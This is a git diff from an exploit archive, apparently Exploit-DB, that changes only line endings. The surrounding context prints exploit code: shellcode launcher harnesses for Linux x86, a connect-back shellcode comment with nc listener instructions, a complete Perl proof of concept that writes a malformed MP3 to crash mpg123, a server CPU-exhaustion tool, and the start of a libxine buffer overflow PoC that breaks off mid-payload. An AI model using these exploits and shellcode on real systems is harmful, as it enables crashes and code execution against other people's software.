 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13435.c b/platforms/lin_x86/shellcode/13435.c
index b65bd46f2..d952366b4 100755
--- a/platforms/lin_x86/shellcode/13435.c
+++ b/platforms/lin_x86/shellcode/13435.c
@@ -48,6 +48,6 @@ void main(){
 * you should modify your ip addr to use it...
 * to use it, nc -l -p 5 , on another terminal nc -l -p 6
 * then run the shellcode with your ip addr or just 127.000.000.001
-*/
-
+*/
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13436.c b/platforms/lin_x86/shellcode/13436.c
index a012d0b8a..f47d537d9 100755
--- a/platforms/lin_x86/shellcode/13436.c
+++ b/platforms/lin_x86/shellcode/13436.c
@@ -85,6 +85,6 @@ main()
 funct = (int (*)()) code;
 printf("%s shellcode\n\tSize = %d\n",NAME,strlen(code));
 (int)(*funct)();
-}
-
+}
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13437.c b/platforms/lin_x86/shellcode/13437.c
index a394174f4..0a80f5222 100755
--- a/platforms/lin_x86/shellcode/13437.c
+++ b/platforms/lin_x86/shellcode/13437.c
@@ -40,6 +40,6 @@ main() {
 ret=(int *)&ret+2;
 printf("Shellcode lenght=%d\n",strlen(shellcode));
 (*ret) = (int)shellcode;
-}
-
+}
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13438.c b/platforms/lin_x86/shellcode/13438.c
index dafdcec5f..b91177dc1 100755
--- a/platforms/lin_x86/shellcode/13438.c
+++ b/platforms/lin_x86/shellcode/13438.c
@@ -75,6 +75,6 @@ __asm__("
 /*
 RaiSe
 http://www.undersec.com
-*/
-
+*/
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13439.c b/platforms/lin_x86/shellcode/13439.c
index e5634d1d8..df11dd07a 100755
--- a/platforms/lin_x86/shellcode/13439.c
+++ b/platforms/lin_x86/shellcode/13439.c
@@ -51,6 +51,6 @@ main() {
 ret=(int *)&ret +2;
 printf("Shellcode lenght=%d\n",strlen(eject));
 (*ret) = (int)eject;
-}
-
+}
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13440.c b/platforms/lin_x86/shellcode/13440.c
index 503af16a1..a7050e526 100755
--- a/platforms/lin_x86/shellcode/13440.c
+++ b/platforms/lin_x86/shellcode/13440.c
@@ -69,6 +69,6 @@ call -0x54
 /*
 RaiSe
 http://www.undersec.com
-*/
-
+*/
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13441.c b/platforms/lin_x86/shellcode/13441.c
index c0f0b595b..39ec23efb 100755
--- a/platforms/lin_x86/shellcode/13441.c
+++ b/platforms/lin_x86/shellcode/13441.c
@@ -64,6 +64,6 @@ int main(void)
 /* Sp4rK
  * UNDERSEC Security TEAM
  * NetSearch E-zine
- */
-
+ */
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13442.c b/platforms/lin_x86/shellcode/13442.c
index a54242647..133ae00a7 100755
--- a/platforms/lin_x86/shellcode/13442.c
+++ b/platforms/lin_x86/shellcode/13442.c
@@ -46,6 +46,6 @@ main() {
 ret=(int *)&ret +2;
 printf("Shellcode lenght=%d\n",strlen(shellcode));
 (*ret) = (int)shellcode;
-}
-
+}
+
 // milw0rm.com [2004-09-26]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13443.c b/platforms/lin_x86/shellcode/13443.c
index b62a9f0b9..0a78d229e 100755
--- a/platforms/lin_x86/shellcode/13443.c
+++ b/platforms/lin_x86/shellcode/13443.c
@@ -32,6 +32,6 @@ main()
 ret=(int *)&ret +2;
 printf("Shellcode lenght=%d\n",strlen(shellcode));
 (*ret) = (int)shellcode;
-}
-
+}
+
 // milw0rm.com [2004-09-12]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13444.c b/platforms/lin_x86/shellcode/13444.c
index aca9efc64..43b886842 100755
--- a/platforms/lin_x86/shellcode/13444.c
+++ b/platforms/lin_x86/shellcode/13444.c
@@ -25,6 +25,6 @@ main() {
 ret=(int *)&ret+2;
 printf("Shellcode lenght=%d\n",strlen(shellcode));
 (*ret) = (int)shellcode;
-}
-
+}
+
 // milw0rm.com [2004-09-12]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13445.c b/platforms/lin_x86/shellcode/13445.c
index 574fa5d01..08dfe16d2 100755
--- a/platforms/lin_x86/shellcode/13445.c
+++ b/platforms/lin_x86/shellcode/13445.c
@@ -32,6 +32,6 @@ main() {
 ret=(int *)&ret +2;
 printf("Shellcode lenght=%d\n",strlen(shellcode));
 (*ret) = (int)shellcode;
-}
-
+}
+
 // milw0rm.com [2004-09-12]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13446.c b/platforms/lin_x86/shellcode/13446.c
index 2fa82844f..216fb4773 100755
--- a/platforms/lin_x86/shellcode/13446.c
+++ b/platforms/lin_x86/shellcode/13446.c
@@ -36,6 +36,6 @@ __asm__ (" movb $0xb, %al # and makeuof here int $0x80 "); -} - +} + // milw0rm.com [2004-09-12] \ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13447.c b/platforms/lin_x86/shellcode/13447.c
index ec05831a3..2210cf6b0 100755
--- a/platforms/lin_x86/shellcode/13447.c
+++ b/platforms/lin_x86/shellcode/13447.c
@@ -45,6 +45,6 @@ main() {
 ret=(int *)&ret +2;
 printf("Shellcode lenght=%d\n",strlen(c0de));
 (*ret) = (int)c0de;
-}
-
+}
+
 // milw0rm.com [2004-09-12]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13448.c b/platforms/lin_x86/shellcode/13448.c
index 6a0c8b547..6da8f3b3f 100755
--- a/platforms/lin_x86/shellcode/13448.c
+++ b/platforms/lin_x86/shellcode/13448.c
@@ -63,6 +63,6 @@ main() {
 ret=(int *)&ret +2;
 printf("Shellcode lenght=%d\n",strlen(shellcode));
 (*ret) = (int)shellcode;
-}
-
+}
+
 // milw0rm.com [2004-09-12]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13449.c b/platforms/lin_x86/shellcode/13449.c
index 191b1ae7c..c21917743 100755
--- a/platforms/lin_x86/shellcode/13449.c
+++ b/platforms/lin_x86/shellcode/13449.c
@@ -134,6 +134,6 @@ void main () {
 ret=(int *)&ret +2;
 printf("Shellcode lenght=%d\n",strlen(shellcode));
 (*ret) = (int)shellcode;
-}
-
+}
+
 // milw0rm.com [2004-09-12]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13450.c b/platforms/lin_x86/shellcode/13450.c
index 2023825a6..cbeb44bad 100755
--- a/platforms/lin_x86/shellcode/13450.c
+++ b/platforms/lin_x86/shellcode/13450.c
@@ -48,6 +48,6 @@ main() {
 ret=(int *)&ret+2;
 printf("Shellcode lenght=%d\n",strlen(shellcode));
 (*ret) = (int)shellcode;
-}
-
+}
+
 // milw0rm.com [2004-09-12]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13451.c b/platforms/lin_x86/shellcode/13451.c
index bc3eb5cef..ce9602fa5 100755
--- a/platforms/lin_x86/shellcode/13451.c
+++ b/platforms/lin_x86/shellcode/13451.c
@@ -22,6 +22,6 @@ void main()
 printf("w00w00!\n");
 ret = (int *)&ret + 2;
 (*ret) = (int)shellcode;
-}
-
+}
+
 // milw0rm.com [2004-09-12]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13452.c b/platforms/lin_x86/shellcode/13452.c
index ae6783be3..52d8e4c31 100755
--- a/platforms/lin_x86/shellcode/13452.c
+++ b/platforms/lin_x86/shellcode/13452.c
@@ -42,6 +42,6 @@ main(void)
 int *ret;
 ret = (int*)&ret + 2;
 (*ret) = shellcode;
-}
-
+}
+
 // milw0rm.com [2004-09-12]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13453.c b/platforms/lin_x86/shellcode/13453.c
index c3ee492b6..da1cdb848 100755
--- a/platforms/lin_x86/shellcode/13453.c
+++ b/platforms/lin_x86/shellcode/13453.c
@@ -49,6 +49,6 @@ main(void)
 int *ret;
 ret = (int*)&ret + 2;
 (*ret) = shellcode;
-}
-
+}
+
 // milw0rm.com [2004-09-12]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13454.c b/platforms/lin_x86/shellcode/13454.c
index c01554e44..8a5d9dc65 100755
--- a/platforms/lin_x86/shellcode/13454.c
+++ b/platforms/lin_x86/shellcode/13454.c
@@ -69,6 +69,6 @@ int main(){
 * chroot(".."); *
 * execve(sh[0],sh,NULL); *
 *} *
-***********************************************/
-
+***********************************************/
+
 // milw0rm.com [2004-09-12]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13455.c b/platforms/lin_x86/shellcode/13455.c
index 8d4f789af..82d258301 100755
--- a/platforms/lin_x86/shellcode/13455.c
+++ b/platforms/lin_x86/shellcode/13455.c
@@ -43,6 +43,6 @@ void main() { } // ANTI-IDS SHELLCODE // -// !!!!!!!!!!!!!!!!!! // - +// !!!!!!!!!!!!!!!!!! // + // milw0rm.com [2004-09-12] \ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13456.c b/platforms/lin_x86/shellcode/13456.c
index 32c11d5b4..7fa19edf9 100755
--- a/platforms/lin_x86/shellcode/13456.c
+++ b/platforms/lin_x86/shellcode/13456.c
@@ -41,6 +41,6 @@ main()
 funct = (int (*)()) code;
 printf("%s shellcode\n\tSize = %d\n",NAME,strlen(code));
 (int)(*funct)();
-}
-
+}
+
 // milw0rm.com [2004-09-12]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13457.c b/platforms/lin_x86/shellcode/13457.c
index 3493c6df2..b267c9023 100755
--- a/platforms/lin_x86/shellcode/13457.c
+++ b/platforms/lin_x86/shellcode/13457.c
@@ -35,6 +35,6 @@ main() {
 ret=(int *)&ret +2;
 printf("Shellcode lenght=%d\n",strlen(c0de));
 (*ret) = (int)c0de;
-}
-
+}
+
 // milw0rm.com [2004-09-12]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13458.c b/platforms/lin_x86/shellcode/13458.c
index f50b6e3cd..aa6447842 100755
--- a/platforms/lin_x86/shellcode/13458.c
+++ b/platforms/lin_x86/shellcode/13458.c
@@ -52,6 +52,6 @@ main()
 funct = (int (*)()) code;
 (int)(*funct)();
 }
-
-
+
+
 // milw0rm.com [2001-05-07]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13459.c b/platforms/lin_x86/shellcode/13459.c
index 52088a9bd..06e4af18b 100755
--- a/platforms/lin_x86/shellcode/13459.c
+++ b/platforms/lin_x86/shellcode/13459.c
@@ -70,6 +70,6 @@ int main(){
 * execve(sh[0],sh,NULL); *
 *} *
 ***********************************************/
-
-
+
+
 // milw0rm.com [2001-01-13]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13460.c b/platforms/lin_x86/shellcode/13460.c
index d74ef30be..f928bd3be 100755
--- a/platforms/lin_x86/shellcode/13460.c
+++ b/platforms/lin_x86/shellcode/13460.c
@@ -40,6 +40,6 @@ main() {
 ret=(int *)&ret +2;
 printf("Shellcode lenght=%d\n",strlen(c0de));
 (*ret) = (int)c0de;
-}
-
+}
+
 // milw0rm.com [2000-08-08]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13461.c b/platforms/lin_x86/shellcode/13461.c
index ff84adefb..023ac6914 100755
--- a/platforms/lin_x86/shellcode/13461.c
+++ b/platforms/lin_x86/shellcode/13461.c
@@ -41,6 +41,6 @@ main() {
 ret=(int *)&ret +2;
 printf("Shellcode lenght=%d\n",strlen(c0de));
 (*ret) = (int)c0de;
-}
-
+}
+
 // milw0rm.com [2000-08-07]
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/13462.c b/platforms/lin_x86/shellcode/13462.c
index ad6f229b8..c026c42a4 100755
--- a/platforms/lin_x86/shellcode/13462.c
+++ b/platforms/lin_x86/shellcode/13462.c
@@ -75,6 +75,6 @@ main() {
 ret=(int *)&ret +2;
 printf("Shellcode lenght=%d\n",strlen(c0de));
 (*ret) = (int)c0de;
-}
-
+}
+
 // milw0rm.com [2000-08-07]
\ No newline at end of file
diff --git a/platforms/linux/dos/1196.c b/platforms/linux/dos/1196.c
index 9a0b0ef2f..88f7fa2e0 100755
--- a/platforms/linux/dos/1196.c
+++ b/platforms/linux/dos/1196.c
@@ -58,6 +58,6 @@ int main(int argc, char **argv) { close(sock); return puts("(done)\n# The server should be frozen now with 100\% cpu usage."); -} - -// milw0rm.com [2005-09-05] +} + +// milw0rm.com [2005-09-05]
diff --git a/platforms/linux/dos/1634.pl b/platforms/linux/dos/1634.pl
index 38a0b6237..864508ee9 100755
--- a/platforms/linux/dos/1634.pl
+++ b/platforms/linux/dos/1634.pl
@@ -1,94 +1,94 @@ -#!/usr/bin/perl -# -# Affected product: mpg123-0.59r - http://mpg123.de -# -# I'm not sure what kind of vulnerability is it, but the program -# receives a SIGSEGV when I play it. My gdb skillz r p00r, but -# anybody with more experience than me can find the *real* bug. -# -# $./mpg1DoS3 0 | mpg123 - -# (- switch tells mpg123 to play from stdin) -# $./mpg1DoS3 1 evil.mp3 -# $mpg123 ./evil.mp3 -# -# Regards. -# Nitrous -# Vulnfact Security Group - http://www.vulnfact.com - -my $evilsong = -"\xff\xf2\xc5\x53\xff\xff\xa1\xe2\x41\x41\xad\x9b\xfb\x3f". -"\xdc\xe0\x38\x4c\x7f\xff\x6f\xe7\x0c\x0f\xc3\x3f\x7f\xef". -"\x9a\xa8\x3e\x00\xaa\xe6\x82\xc3\xe8\x65\x7f\xf1\x39\x25". -"\x24\xec\x43\xe6\x12\x44\xb9\xd5\x7a\x2a\x26\xce\xff\xeb". -"\xea\xc7\x2c\xde\x9b\xee\xba\x5a\xe7\x0b\x9d\x14\xef\xe7". -"\x6b\xf5\xa2\xb0\x5c\x4b\x23\xff\xff\xe4\xc2\x53\xff\xff". -"\xad\x21\x27\x0d\x84\xd2\x7d\x1e\xad\x5e\x96\x62\x54\x32". -"\x85\x89\x24\x93\xed\xf3\xac\xd4\x94\xea\x58\x54\xca\x29". -"\x1d\x7d\x7e\xd3\x34\x7e\xb4\x44\x24\x6a\x25\xde\xff\xed". -"\x57\x9d\x2e\x94\xcb\xe3\xd5\x48\x96\x74\x5b\xf7\xd6\x74". -"\x84\xfc\x9a\xc0\x79\x75\x7a\x1e\x31\x1f\x9f\x9f\x11\x94". -"\xd1\x2c\x48\xfe\x5d\x58\xd1\x9f\x2b\x25\x2a\xff\xff\xd0". -"\x15\x48\x1f\xff\xfe\x83\x21\xcf\xff\xff\x52\x61\x18\x6a". -"\xdf\xff\xfa\x90\x11\x01\x59\x37\xfd\x13\xf5\x3c\x7e\x58". -"\x71\xe8\x67\xd1\x0e\xcd\xee\x80\xb4\x35\x2a\x4b\x4f\xff". -"\xf8\xb0\x03\x82\x1c\xf3\x87\x5f\x6e\xf9\x9a\xdc\x5e\x49". -"\x51\xc6\xe0\x15\x04\xca\x49\x14\x0d\x90\x25\x0a\x54\x04". -"\x3c\xc0\x57\x3c\x8a\x7a\x56\x1c\x42\xf2\x47\x47\xb0\x1c". -"\x67\xff\xff\xac\xc1\x17\xff\xff\xea\x19\x89\x63\x4f\xff". -"\xf5\x2e\x91\x04\x59\x93\x93\xff\xf7\xd5\xb9\x28\x46\x20". -"\x9e\xd5\xef\xad\x6d\xb6\x98\x6c\x96\xac\xf3\xd6\x8e\xdc". -"\xc1\x5a\x1a\x8d\x02\x67\x1e\xc3\xc9\xfe\xbf\xfe\x89\xc1". -"\xf4\x79\x98\x4e\x33\x8b\xc8\x00\x41\x54\x94\x8c\x06\xc2". -"\x69\x58\x8a\x04\xc1\x76\x2f\x67\x6c\x09\x0e\xff\xfb\x92". 
-"\x60\xb9\x00\x02\x6d\x67\x56\xe1\xe7\x3b\x68\x63\x2c\xea". -"\xdd\x60\xed\x6d\x0a\x65\x9d\x5d\x87\xb5\x4d\xa1\x71\x2f". -"\xab\x74\xf5\x35\xb4\xd4\xce\xb6\x76\x7f\x73\x44\x16\xb5". -"\x35\x01\x59\xbf\xff\xfa\x01\xa4\xd7\xff\xff\xe7\x96\x7f". -"\xff\xfe\xa5\x89\x85\xbf\xff\xff\x3c\x7c\x21\x1f\xff\x7f". -"\xf3\x4f\x63\x3f\x6e\x3f\x9a\x9b\x9a\x54\x1d\x02\x52\x32". -"\xec\x7e\xad\xd3\xfd\x09\x82\xd8\x82\x38\xb8\xa0\xde\xf6". -"\xd3\xde\x23\xa0\x0a\x51\xb8\xc0\x61\xc6\xe5\x20\x02\x48". -"\x51\x9c\xa7\x94\xd7\xda\xfc\x4e\x7a\xea\x0b\x19\x84\xd6". -"\xca\x8d\x01\xbb\x5f\xab\xff\xf2\xa1\xe6\x7f\xff\xff\xa8". -"\xc8\x4b\x0b\x1b\xff\xf7\x5a\xa8\x0c\x18\x54\x44\x45\xbf". -"\xff\xe8\x06\x81\x81\x37\x45\x5f\xf4\x3d\xf8\x37\x0d\x12". -"\x47\xff\x32\x6f\xcc\x87\xa2\x49"; - -sub usage -{ - print "###################################################\n"; - print "#### mpg123 DoS Proof of Concept ####\n"; - print "###### nitrousconthacktocommx ######\n"; - print "###################################################\n\n"; - print "Usage: $0 [evil.mp3]\n"; - print "\tmodes: [0 (stdout) | 1 (file)]\n"; - exit; -} - -if(@ARGV < 1){ - usage; -} - -if($ARGV[0] == 0){ - print $evilsong; -} -elsif($ARGV[0] == 1){ - if(!$ARGV[1]){ - print "Filename required !\n\n"; - usage; - } - - open(EV1L, ">$ARGV[1]") or die "Cannot create \"$ARGV[1]\"\n"; - - print EV1L $evilsong; - - close(EV1L); - - print "Ready !\nNow just type \$mpg123 $ARGV[1]\n"; -} -else{ - print "Invalid Mode !\n\n"; - usage; -} - -# milw0rm.com [2006-04-02] +#!/usr/bin/perl +# +# Affected product: mpg123-0.59r - http://mpg123.de +# +# I'm not sure what kind of vulnerability is it, but the program +# receives a SIGSEGV when I play it. My gdb skillz r p00r, but +# anybody with more experience than me can find the *real* bug. +# +# $./mpg1DoS3 0 | mpg123 - +# (- switch tells mpg123 to play from stdin) +# $./mpg1DoS3 1 evil.mp3 +# $mpg123 ./evil.mp3 +# +# Regards. 
+# Nitrous +# Vulnfact Security Group - http://www.vulnfact.com + +my $evilsong = +"\xff\xf2\xc5\x53\xff\xff\xa1\xe2\x41\x41\xad\x9b\xfb\x3f". +"\xdc\xe0\x38\x4c\x7f\xff\x6f\xe7\x0c\x0f\xc3\x3f\x7f\xef". +"\x9a\xa8\x3e\x00\xaa\xe6\x82\xc3\xe8\x65\x7f\xf1\x39\x25". +"\x24\xec\x43\xe6\x12\x44\xb9\xd5\x7a\x2a\x26\xce\xff\xeb". +"\xea\xc7\x2c\xde\x9b\xee\xba\x5a\xe7\x0b\x9d\x14\xef\xe7". +"\x6b\xf5\xa2\xb0\x5c\x4b\x23\xff\xff\xe4\xc2\x53\xff\xff". +"\xad\x21\x27\x0d\x84\xd2\x7d\x1e\xad\x5e\x96\x62\x54\x32". +"\x85\x89\x24\x93\xed\xf3\xac\xd4\x94\xea\x58\x54\xca\x29". +"\x1d\x7d\x7e\xd3\x34\x7e\xb4\x44\x24\x6a\x25\xde\xff\xed". +"\x57\x9d\x2e\x94\xcb\xe3\xd5\x48\x96\x74\x5b\xf7\xd6\x74". +"\x84\xfc\x9a\xc0\x79\x75\x7a\x1e\x31\x1f\x9f\x9f\x11\x94". +"\xd1\x2c\x48\xfe\x5d\x58\xd1\x9f\x2b\x25\x2a\xff\xff\xd0". +"\x15\x48\x1f\xff\xfe\x83\x21\xcf\xff\xff\x52\x61\x18\x6a". +"\xdf\xff\xfa\x90\x11\x01\x59\x37\xfd\x13\xf5\x3c\x7e\x58". +"\x71\xe8\x67\xd1\x0e\xcd\xee\x80\xb4\x35\x2a\x4b\x4f\xff". +"\xf8\xb0\x03\x82\x1c\xf3\x87\x5f\x6e\xf9\x9a\xdc\x5e\x49". +"\x51\xc6\xe0\x15\x04\xca\x49\x14\x0d\x90\x25\x0a\x54\x04". +"\x3c\xc0\x57\x3c\x8a\x7a\x56\x1c\x42\xf2\x47\x47\xb0\x1c". +"\x67\xff\xff\xac\xc1\x17\xff\xff\xea\x19\x89\x63\x4f\xff". +"\xf5\x2e\x91\x04\x59\x93\x93\xff\xf7\xd5\xb9\x28\x46\x20". +"\x9e\xd5\xef\xad\x6d\xb6\x98\x6c\x96\xac\xf3\xd6\x8e\xdc". +"\xc1\x5a\x1a\x8d\x02\x67\x1e\xc3\xc9\xfe\xbf\xfe\x89\xc1". +"\xf4\x79\x98\x4e\x33\x8b\xc8\x00\x41\x54\x94\x8c\x06\xc2". +"\x69\x58\x8a\x04\xc1\x76\x2f\x67\x6c\x09\x0e\xff\xfb\x92". +"\x60\xb9\x00\x02\x6d\x67\x56\xe1\xe7\x3b\x68\x63\x2c\xea". +"\xdd\x60\xed\x6d\x0a\x65\x9d\x5d\x87\xb5\x4d\xa1\x71\x2f". +"\xab\x74\xf5\x35\xb4\xd4\xce\xb6\x76\x7f\x73\x44\x16\xb5". +"\x35\x01\x59\xbf\xff\xfa\x01\xa4\xd7\xff\xff\xe7\x96\x7f". +"\xff\xfe\xa5\x89\x85\xbf\xff\xff\x3c\x7c\x21\x1f\xff\x7f". +"\xf3\x4f\x63\x3f\x6e\x3f\x9a\x9b\x9a\x54\x1d\x02\x52\x32". +"\xec\x7e\xad\xd3\xfd\x09\x82\xd8\x82\x38\xb8\xa0\xde\xf6". 
+"\xd3\xde\x23\xa0\x0a\x51\xb8\xc0\x61\xc6\xe5\x20\x02\x48". +"\x51\x9c\xa7\x94\xd7\xda\xfc\x4e\x7a\xea\x0b\x19\x84\xd6". +"\xca\x8d\x01\xbb\x5f\xab\xff\xf2\xa1\xe6\x7f\xff\xff\xa8". +"\xc8\x4b\x0b\x1b\xff\xf7\x5a\xa8\x0c\x18\x54\x44\x45\xbf". +"\xff\xe8\x06\x81\x81\x37\x45\x5f\xf4\x3d\xf8\x37\x0d\x12". +"\x47\xff\x32\x6f\xcc\x87\xa2\x49"; + +sub usage +{ + print "###################################################\n"; + print "#### mpg123 DoS Proof of Concept ####\n"; + print "###### nitrousconthacktocommx ######\n"; + print "###################################################\n\n"; + print "Usage: $0 [evil.mp3]\n"; + print "\tmodes: [0 (stdout) | 1 (file)]\n"; + exit; +} + +if(@ARGV < 1){ + usage; +} + +if($ARGV[0] == 0){ + print $evilsong; +} +elsif($ARGV[0] == 1){ + if(!$ARGV[1]){ + print "Filename required !\n\n"; + usage; + } + + open(EV1L, ">$ARGV[1]") or die "Cannot create \"$ARGV[1]\"\n"; + + print EV1L $evilsong; + + close(EV1L); + + print "Ready !\nNow just type \$mpg123 $ARGV[1]\n"; +} +else{ + print "Invalid Mode !\n\n"; + usage; +} + +# milw0rm.com [2006-04-02] diff --git a/platforms/linux/dos/1641.pl b/platforms/linux/dos/1641.pl index 9ed5d2b7e..071efda6e 100755 --- a/platforms/linux/dos/1641.pl +++ b/platforms/linux/dos/1641.pl 
@@ -1,384 +1,384 @@ -#!/usr/bin/perl -##################################################################### -# Libxine <= 1.14 : MPEG Stream Buffer overflow vulnerability / PoC -# -# Federico L. Bossi Bonin -# fbossi[at]netcomm.com.ar -#################################################################### - - -# (gdb) run /tmp/egg.mpeg -# Starting program: /usr/bin/gxine /tmp/egg.mpeg -# Program received signal SIGSEGV, Segmentation fault. -# [Switching to Thread -1276580944 (LWP 30688)] -# 0xb7edee9a in xine_list_delete_current () from /usr/lib/libxine.so.1 -# (gdb) x/x $ebp -# 0x8e2cbd4: 0x41414141 -# (gdb) - -my $EGGFILE="egg.mpeg"; -my $len=2024; - -my $header= -"\x30\x26\xB2\x75\x8E\x66\xCF\x11\xA6\xD9\x00\xAA\x00\x62\xCE\x6C\x2E\xA9\xCF\x11\x8E\xE3\x00\xC0". -"\x0C\x20\x53\x65\x2E\x00\x00\x00\x00\x00\x00\x00\x11\xD2\xD3\xAB\xBA\xA9\xCF\x11\x8E\xE6\x00\xC0". -"\x0C\x20\x53\x65\x06\x00\x00\x00\x00\x00\x91\x07\xDC\xB7\xB7\xA9\xCF\x11\x8E\xE6\x00\xC0\x0C\x20". -"\x53\x65\x72\x00\x00\x00\x00\x00\x00\x00\x40\x9E\x69\xF8\x4D\x5B\xCF\x11\xA8\xFD\x00\x80\x5F\x5C". -"\x44\x2B\x50\xCD\xC3\xBF\x8F\x61\xCF\x11\x8B\xB2\x00\xAA\x00\xB4\xE2\x20\x00\x00\x00\x00\x00\x00". -"\x00\x00\x1C\x00\x00\x00\x08\x00\x00\x00\x01\x00\x40\x34\x7C\x00\x61\x01\x01\x00\x80\x3E\x00\x00". -"\xD0\x07\x00\x00\x80\x02\x10\x00\x0A\x00\x00\x22\x00\x00\x0E\x00\x80\x07\x00\x00\x01\x80\x02\x80". -"\x02\x01\x00\x00\x91\x07\xDC\xB7\xB7\xA9\xCF\x11\x8E\xE6\x00\xC0\x0C\x20\x53\x65\x81\x00\x00\x00". -"\x00\x00\x00\x00\xC0\xEF\x19\xBC\x4D\x5B\xCF\x11\xA8\xFD\x00\x80\x5F\x5C\x44\x2B\x00\x57\xFB\x20". -"\x55\x5B\xCF\x11\xA8\xFD\x00\x80\x5F\x5C\x44\x2B\x00\x00\x00\x00\x00\x00\x00\x00\x33\x00\x00\x00". -"\x00\x00\x00\x00\x02\x00\x40\x34\x7C\x00\x40\x01\x00\x00\xF0\x00\x00\x00\x02\x28\x00\x28\x00\x00". -"\x00\x40\x01\x00\x00\xF0\x00\x00\x00\x01\x00\x18\x00\x57\x4D\x56\x31\x00\x00\x00\x00\x00\x00\x00". 
-"\x00\x00\x00\x00\x00\x00\x00\x01\xCD"; - - -my $end= -"\x24\x84\x21\x00\x06\x06\x94\xA4\xB4\x92\xF5\xA7\x55\x54\x7E\xB6\xB3\x3A\xE9\x65\xA7\xEE\xDE\x9B". -"\x7B\xE4\x25\x34\xA1\x08\x13\x29\x21\xB4\x54\x4D\x0F\xA0\xA1\x3C\x74\x83\x0D\x1A\x32\x36\xAB\xC6". -"\x91\xD5\xD0\x88\xC6\x62\x1E\x71\x65\x2F\xDC\x44\xAE\x0B\x78\x74\x14\xD3\x84\x9F\xCE\x80\x80\xA2". -"\x52\x94\x41\xA8\x84\x3B\x09\x09\x44\xA2\x1B\xD4\xA7\x1B\xC7\x52\xDF\x00\x83\x23\x19\x88\xF6\xA5". -"\x09\x9A\x9C\x78\x6F\xA9\x7E\x9A\x52\x2A\x8D\x12\xD0\x46\x88\x68\x54\x24\xB2\x53\x51\x14\x09\x10". -"\x11\xB2\x60\xED\x83\x30\xAA\x27\xA6\xC4\x32\x37\x20\x06\xB4\x4A\xB2\xD5\x40\x2C\x88\xC4\x0E\x63". -"\x15\x59\x19\x6C\x30\xBC\x75\xFE\x1E\x50\x10\x43\x63\x21\x1E\xFD\x44\x31\xF0\xA1\x69\xF3\xB2\xFE". -"\x60\x01\x24\x58\x54\x1A\x81\x44\xD5\x4C\x22\x94\xC4\x00\x6A\x69\x70\xE5\xA9\x63\x4C\x5D\xA6\xCB". -"\x2A\xB0\x1E\xEC\x36\xE2\x03\x4E\x98\xC0\x08\xBB\x76\xB5\xD0\x5E\x1E\x3A\xBE\xFA\x02\x81\x05\x35". -"\x31\x11\xED\x5A\x94\x19\x5B\x41\x42\x00\x7C\x52\x52\x02\x13\x74\x6C\x2A\xC2\xC0\x21\x92\x50\x29". -"\x82\x96\x61\x9D\x4C\x88\xD5\xC6\x5A\xA8\xB4\x11\x07\x71\x37\xB4\x91\x62\xAD\x81\x2C\x56\x4F\xBB". -"\x4D\x75\x73\x1E\x3A\xFE\xFF\x00\x81\x85\x35\x32\x11\xEF\xD4\x83\x91\xA8\xAA\x87\xE6\x9A\x68\x29". -"\x29\xB8\x74\x64\x41\xD1\x46\x93\x2B\x0A\xA9\x04\x1A\xA0\x12\x4C\xAF\x67\x4A\x99\x00\x6F\xB6\x33". -"\x62\x40\x32\x35\x01\xAA\xEC\x02\xD6\x75\x2E\x4E\x6A\xAE\x71\x95\x78\xE9\xFB\xDC\x00\x00\x02\x22". -"\x98\x90\xF6\x34\x99\x8A\x50\x00\x7E\xED\x8B\xF0\xEA\x22\x20\x96\x36\x40\x6C\x02\x18\x0B\x0B\xE2". -"\x83\x25\x2D\x29\x32\x22\x61\x59\x8B\x32\x25\xCF\x52\x24\x96\xF3\x64\xE8\x19\x3B\x20\x41\x52\x75". -"\x5B\x4F\x93\x85\xE3\xAB\xEF\x98\x30\x20\xA8\xC6\x42\x3D\x7F\xB0\x82\xD1\x44\x53\xC4\xF8\x50\xB1". -"\x12\x2A\x4C\x32\x01\x56\xAC\x43\x24\x10\x69\x4A\x09\x13\x15\x68\x86\xCD\xFA\x0D\xC7\x2C\x02\xFD". -"\x2B\x24\x86\x2F\x86\x96\x09\xD3\x44\xCA\x85\x2C\x0C\x10\xC2\xDB\x5A\xE9\x8F\x1D\x3F\x68\x08\x08". 
